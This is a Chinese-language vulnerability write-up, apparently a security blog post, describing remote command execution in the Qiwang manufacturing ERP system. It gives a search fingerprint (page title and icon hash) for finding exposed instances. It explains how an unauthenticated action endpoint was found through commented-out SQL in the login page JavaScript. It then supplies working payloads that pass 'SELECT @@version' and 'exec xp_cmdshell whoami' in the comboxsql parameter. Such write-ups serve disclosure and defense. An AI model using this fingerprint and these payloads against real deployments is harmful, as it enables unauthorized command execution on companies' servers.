企望制造ERP系统RCE

1
2
title="企望制造ERP系统"
icon_hash="2037458993"

1655197176005-34032bd4-03de-40fd-aec0-2d83292d8496.png

burp请求中发现漏洞

通过burp查看其所有的请求,发现有执行数据库语句的请求(较为敏感)

1655205708445-9041572e-98a4-4444-b706-466d781f1da8.png

通过对其进行sql语句尝试发现为sqlserver数据库,使用xp_cmdshell可以执行命令

comboxsql=SELECT+@@version

comboxsql=exec xp_cmdshell “whoami”

1655205824101-85fd5a32-ea25-416b-94fc-3595960223e2.png

1655205865170-fb64349c-6fc8-489b-9a92-217c851e0a4f.png

js查找漏洞点

登录页面,可以搜索一些关键字,比如username,password,sql关键字等

1655197258199-c6201c0f-0152-4f31-8d0b-cf0cec319be5.png

1655197280392-2e950b20-a41b-4cc3-85d3-5889e4bc6a79.png

发现注释了一段sql语句!

跟踪一下这个变量,可以看到这边定义了一个action类

1655197306985-0afe1144-f327-4058-9a51-ee34dcd379e1.png

搜索这个action类路径

发现访问方式是通过url拼接的。

1655197331702-13e33946-92c8-425f-a923-9b3e756c11d8.png

尝试拼接url访问,发现可以访问,且有回显。

1655197377380-3ded600d-b25a-4e19-817c-6d58abfda8d4.png

试一试使用js里面注释的sql填入sql语句查version看看

comboxsql=SELECT+@@version

1655197525486-a1f493a7-d431-4ec2-803e-81dd873aa434.png

发现是mssql,尝试exec

comboxsql=exec xp_cmdshell “whoami”

1655197617984-83730aba-2020-4230-acaa-5701a0768efc.png

更新: 2023-04-22 23:09:43
原文: https://www.yuque.com/yuqueyonghuwrqimt/vtxvff/xy54lo


企望制造ERP系统RCE
https://savior-only.github.io/p/2d18cd18eb82418cb42d44a651b23e84/
作者
savior
发布于
2024年12月25日
许可协议